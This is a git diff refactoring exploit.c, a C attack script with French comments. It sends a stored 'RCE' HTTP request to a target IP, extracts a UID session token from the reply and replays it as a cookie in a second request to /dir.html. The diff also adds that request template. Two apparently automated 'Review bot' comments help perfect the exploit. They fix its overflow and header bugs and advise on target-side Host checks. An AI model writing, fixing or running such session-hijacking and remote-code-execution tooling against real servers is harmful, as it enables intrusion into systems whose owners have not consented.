diff --git a/exploit.c b/exploit.c
index 83d7ff1..795c1aa 100644
--- a/exploit.c
+++ b/exploit.c
@@ -3,79 +3,233 @@ #include #include #include +#include -int main(int argc, char** argv){ - if (argc != 2){ - printf("u must specifie IP addr\n"); - exit(1); - } - printf("target = %s\n", argv[1]); - int domain = AF_INET; - int type = SOCK_STREAM; - int fd = socket(domain, type, 0); - printf("fd = %d\n", fd); +void envoie_request(void); +void recevoir_request(void); +void recup_uid(void); - struct sockaddr_in dest_addr; - memset(&dest_addr, 0, sizeof(dest_addr)); - dest_addr.sin_family = AF_INET; - dest_addr.sin_port = htons(80); - dest_addr.sin_addr.s_addr = inet_addr(argv[1]); +int creer_et_connecter_socket(const char* ip_addr) { + int domain = AF_INET; + int type = SOCK_STREAM; + int fd = socket(domain, type, 0); + if (fd < 0) { + printf("Erreur création socket\n"); + return -1; + } + printf("fd = %d\n", fd); - int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr)); - printf("ret_connect = %d\n", ret); + struct sockaddr_in dest_addr; + memset(&dest_addr, 0, sizeof(dest_addr)); + dest_addr.sin_family = AF_INET; + dest_addr.sin_port = htons(80); + dest_addr.sin_addr.s_addr = inet_addr(ip_addr); - FILE* fichier_out = fopen("request_rce.txt", "r"); - fseek(fichier_out, 0, SEEK_END); - - - int size = fichier_out->_offset; - char* file_buffer = malloc(size); - - fseek(fichier_out, 0, SEEK_SET); - fread(file_buffer, 1, size, fichier_out); - - for (int i = 0; i < size; i++){ - char c = file_buffer[i]; - if (c == '\n') - send(fd, "\r\n", 2, 0); - else - send(fd, &c, 1, 0); - } - send(fd, "\r\n", 2, 0); - - printf("recv:\n"); - char c = 0; - int n = 0; - char* text = calloc(1, 1); - int len = 0; - while (( n = recv(fd, &c, 1, 0)) > 0){ - len = strlen(text) + 2; - text = realloc(text, len); - text[len - 2] = c; - text[len - 1] = 0; - } - int index = 0; - char uid[400]; - while (text[index]){ - if (text[index] == 'U'){ - if (strncmp(text + index, "UID=", 4) == 0){ - printf("pattern found\n"); - index += 4; - int j = 0 ; - while(text[index] && text[index] != 
';' && text[index] != '\r' && text[index] != '\n'){ - uid[j] = text[index]; - j++; - index++; - } - uid[j + 1] = 0; - break; - } - } - index++; - - } - printf("uid=%s\n", uid); - fclose(fichier_out); - free(file_buffer); - return 0; + int ret = connect(fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr)); + if (ret < 0) { + printf("Erreur connexion\n"); + close(fd); + return -1; + } + printf("ret_connect = %d\n", ret); + + return fd; +} + +void envoyer_requete(int fd, const char* fichier_requete) { + FILE* fichier_out = fopen(fichier_requete, "r"); + if (!fichier_out) { + printf("Erreur ouverture fichier: %s\n", fichier_requete); + return; + } + + fseek(fichier_out, 0, SEEK_END); + long size = ftell(fichier_out); + char* file_buffer = malloc(size + 1); + + fseek(fichier_out, 0, SEEK_SET); + fread(file_buffer, 1, size, fichier_out); + file_buffer[size] = '\0'; + + printf("\n--- Envoi requête depuis %s ---\n", fichier_requete); + + for (int i = 0; i < size; i++) { + char c = file_buffer[i]; + if (c == '\n') + send(fd, "\r\n", 2, 0); + else + send(fd, &c, 1, 0); + } + send(fd, "\r\n", 2, 0); + + free(file_buffer); + fclose(fichier_out); +} + +void recevoir_reponse(int fd, char** reponse, int* taille) { + char c = 0; + int n = 0; + char* text = calloc(1, 1); + int len = 0; + + printf("\n--- Réponse reçue ---\n"); + + struct timeval tv; + tv.tv_sec = 5; + tv.tv_usec = 0; + setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + + while ((n = recv(fd, &c, 1, 0)) > 0) { + printf("%c", c); + len = strlen(text) + 2; + text = realloc(text, len); + text[len - 2] = c; + text[len - 1] = 0; + } + + printf("\n--- Fin réponse ---\n"); + + *reponse = text; + *taille = len; +} + +char* extraire_uid(const char* reponse) { + int index = 0; + char* uid = malloc(400); + memset(uid, 0, 400); + + while (reponse[index]) { + if (reponse[index] == 'U') { + if (strncmp(reponse + index, "UID=", 4) == 0) { + printf("\nPattern UID= trouvé\n"); + index += 4; + int j = 0; + while 
(reponse[index] && reponse[index] != ';' && + reponse[index] != '\r' && reponse[index] != '\n') { + uid[j] = reponse[index]; + j++; + index++; + } + uid[j] = 0; + break; + } + } + index++; + } + + if (strlen(uid) == 0) { + printf("UID non trouvé dans la réponse\n"); + free(uid); + return NULL; + } + + printf("UID extrait = %s\n", uid); + return uid; +} + +void envoyer_requete_dir_avec_token(int fd, const char* fichier_requete, const char* uid) { + FILE* fichier_out = fopen(fichier_requete, "r"); + if (!fichier_out) { + printf("Erreur ouverture fichier: %s\n", fichier_requete); + return; + } + + fseek(fichier_out, 0, SEEK_END); + long size = ftell(fichier_out); + char* file_buffer = malloc(size + 1); + + fseek(fichier_out, 0, SEEK_SET); + fread(file_buffer, 1, size, fichier_out); + file_buffer[size] = '\0'; + + printf("\n--- Envoi requête DIR avec UID: %s ---\n", uid); + + for (int i = 0; i < size; i++) { + char c = file_buffer[i]; + printf("%c", c); + + if (c == 'U') { + if (strncmp(file_buffer + i, "UID=", 4) == 0) { + send(fd, file_buffer + i, 4, 0); + send(fd, uid, strlen(uid), 0); + send(fd, "\r\n", 2, 0); + printf("ID=%s", uid); + i += 3; + continue; + } + } + else if (c == '\n') { + send(fd, "\r\n", 2, 0); + } + else { + send(fd, &c, 1, 0); + } + } + send(fd, "\r\n\r\n", 4, 0); + + free(file_buffer); + fclose(fichier_out); +} + +int main(int argc, char** argv) { + if (argc != 2) { + printf("Tu dois spécifier l'adresse IP\n"); + exit(1); + } + + printf("target = %s\n", argv[1]); + + printf("\n========== PREMIÈRE REQUÊTE (RCE) ==========\n"); + + int fd = creer_et_connecter_socket(argv[1]); + if (fd < 0) { + exit(1); + } + + envoyer_requete(fd, "request_rce.txt"); + + char* reponse1 = NULL; + int taille1 = 0; + recevoir_reponse(fd, &reponse1, &taille1); + + char* uid = extraire_uid(reponse1); + + close(fd); + + if (!uid) { + printf("Impossible d'extraire l'UID, arrêt du programme\n"); + free(reponse1); + exit(1); + } + + printf("\nUID récupéré avec succès: 
[%s]\n", uid);
+
+ printf("\n========== DEUXIÈME REQUÊTE (DIR) ==========\n");
+
+ int fd2 = creer_et_connecter_socket(argv[1]);
+ if (fd2 < 0) {
+ free(uid);
+ free(reponse1);
+ exit(1);
+ }
+
+ envoyer_requete_dir_avec_token(fd2, "request_dir_with_token.txt", uid);
+
+ char* reponse2 = NULL;
+ int taille2 = 0;
+ recevoir_reponse(fd2, &reponse2, &taille2);
+
+ if (reponse2 && strlen(reponse2) > 0) {
+ printf("\n--- RÉPONSE DIR COMPLÈTE ---\n");
+ printf("%s\n", reponse2);
+ } else {
+ printf("\nAucune réponse reçue pour la requête DIR\n");
+ }
+
+ close(fd2);
+ free(uid);
+ free(reponse1);
+ free(reponse2);
+
+ return 0;
 }
diff --git a/request_dir_with_token.txt b/request_dir_with_token.txt
index e69de29..016bdec 100644
--- a/request_dir_with_token.txt
+++ b/request_dir_with_token.txt
@@ -0,0 +1,17 @@
+POST /dir.html HTTP/1.1
+Host: localhost
+sec-ch-ua-platform: "Windows"
+Accept-Language: fr-FR,fr;q=0.9
+sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
+Content-Type: application/x-www-form-urlencoded
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
+Accept: */*
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/main.html
+Accept-Encoding: gzip, deflate, br
+Cookie: client_lang=french; viewmode=0; UID=
+Connection: keep-alive
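Review bot: `extraire_uid` copies the bytes following `UID=` into a fixed 400-byte heap buffer with no bound on `j`, so a response from the target whose UID value runs longer than 399 bytes before the next `;`, CR or LF overflows the heap — that response is entirely under the remote server's control, so the tool itself becomes the exploitable side; bound the loop with `while (reponse[index] && j < 399 && reponse[index] != ';' && reponse[index] != '\r' && reponse[index] != '\n') {`. Two further defects sit in `envoyer_requete_dir_avec_token`: any `'U'` that does not begin `UID=` enters the first branch and is never sent (the template's `User-Agent` header goes out as `ser-Agent`), and after injecting the UID the code sends `\r\n` and then the template's own `\n` on the same line is sent as a second `\r\n`, which closes the header block before `Connection: keep-alive`. Removing the `send(fd, "\r\n", 2, 0);` after the UID and letting a non-`UID=` `'U'` fall through to the plain per-byte send fixes both. The return values of `send`, `fread` and `ftell` are unchecked throughout the hunk, and a failed `ftell` (-1) would make `file_buffer[size] = '\0'` write before the allocation.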
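Review bot: The template advertises `Accept-Encoding: gzip, deflate, br`, yet the C side in exploit.c scans the raw response bytes for the literal `UID=` and prints the body as text, so a server that honours the header returns a compressed body the scanner cannot search; drop that line or send `Accept-Encoding: identity`. `Host`, `Origin` and `Referer` are also pinned to `localhost` while the target address is a runtime argument — presumably fine for the intended target, but worth confirming it does not validate the Host header. The file ends on `Connection: keep-alive` with no `Content-Length` for a POST; the sender appends its own terminating CRLFs, so any body would have to come from the code, not this file.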